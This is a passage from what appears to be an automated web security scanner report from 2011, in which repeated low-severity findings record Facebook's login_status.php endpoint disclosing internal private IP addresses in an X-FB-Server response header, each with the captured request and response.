GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df34645fdf4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff324587f18%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfbd26be04%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff324587f18%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df68308334%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3816d4624%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff324587f18%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df68308334&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df11013b438%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff324587f18%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df68308334&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df290cf2c24%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff324587f18%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df68308334&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.97.35
X-Cnection: close
Date: Thu, 16 Jun 2011 15:26:19 GMT
Content-Length: 22

Invalid Application ID

19.661. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.119.113

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2f7577344%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff30c81b7ac%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2bad6b28%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff30c81b7ac%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1b56b4c34%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df39ff2c648%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff30c81b7ac%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1b56b4c34&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df902c04a8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff30c81b7ac%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1b56b4c34&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1ed8121b4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff30c81b7ac%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1b56b4c34&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.119.113
X-Cnection: close
Date: Thu, 16 Jun 2011 17:51:05 GMT
Content-Length: 22

Invalid Application ID

19.662. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.187.50

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1841b04b%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff8749c90c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df298401b38%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff8749c90c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff4a062b4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2a1f1d1a4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff8749c90c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff4a062b4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3f56d06a8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff8749c90c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff4a062b4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1e5749f7c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff8749c90c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff4a062b4&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.187.50
X-Cnection: close
Date: Thu, 16 Jun 2011 18:48:04 GMT
Content-Length: 22

Invalid Application ID

19.663. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.18.59

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1e2bff14%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff96bb174%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3a7182ff4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff96bb174%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df260ae92b4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2bb925ed%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff96bb174%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df260ae92b4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1456a5478%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff96bb174%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df260ae92b4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1824bf2a8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff96bb174%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df260ae92b4&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.18.59
X-Cnection: close
Date: Thu, 16 Jun 2011 14:50:09 GMT
Content-Length: 22

Invalid Application ID

19.664. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.41.104

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df19d7c6864%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1eb889e7%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df38aa4b934%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1eb889e7%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df125410%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1cd0ccd2c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1eb889e7%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df125410&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3da914b2c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1eb889e7%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df125410&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2a922e8e%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1eb889e7%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df125410&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.41.104
X-Cnection: close
Date: Thu, 16 Jun 2011 13:27:31 GMT
Content-Length: 22

Invalid Application ID

19.665. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.134.32

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df37d8a35e8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff23d30ecb4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df6815fb0%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff23d30ecb4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df28842d94%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df217d9314%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff23d30ecb4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df28842d94&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df392bb5348%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff23d30ecb4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df28842d94&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2c05bf6a8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff23d30ecb4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df28842d94&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.134.32
X-Cnection: close
Date: Thu, 16 Jun 2011 18:58:26 GMT
Content-Length: 22

Invalid Application ID

19.666. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.113.65

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df9afbfb2%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff23649a554%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df220910d34%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff23649a554%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2ab2ad584%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3f2daf87c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff23649a554%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2ab2ad584&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df19bf75544%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff23649a554%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2ab2ad584&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df714dfecc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff23649a554%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2ab2ad584&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.113.65
X-Cnection: close
Date: Thu, 16 Jun 2011 18:53:14 GMT
Content-Length: 22

Invalid Application ID

19.667. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.201.65

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df63778c3%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffbe2c2ba%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3985b143c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffbe2c2ba%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df31df2e7ac%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2b2b68854%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffbe2c2ba%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df31df2e7ac&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df24df1c32c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffbe2c2ba%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df31df2e7ac&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df27d10dc7%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffbe2c2ba%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df31df2e7ac&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.201.65
X-Cnection: close
Date: Thu, 16 Jun 2011 13:37:49 GMT
Content-Length: 22

Invalid Application ID

19.668. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.176.59

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df11a977b6c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff21d29845c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3a71bc81%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff21d29845c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df232c9265c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df854f7924%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff21d29845c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df232c9265c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2a9a634b4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff21d29845c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df232c9265c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1f74dc1c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff21d29845c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df232c9265c&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.176.59
X-Cnection: close
Date: Thu, 16 Jun 2011 19:03:44 GMT
Content-Length: 22

Invalid Application ID

19.669. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.73.41

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df344d312e4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffef219d14%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df100de19c8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffef219d14%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfae31db88%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2f89759b4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffef219d14%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfae31db88&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df396f66dc8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffef219d14%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfae31db88&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3d71effec%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffef219d14%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfae31db88&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.73.41
X-Cnection: close
Date: Thu, 16 Jun 2011 13:01:37 GMT
Content-Length: 22

Invalid Application ID

19.670. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.217.101

Request

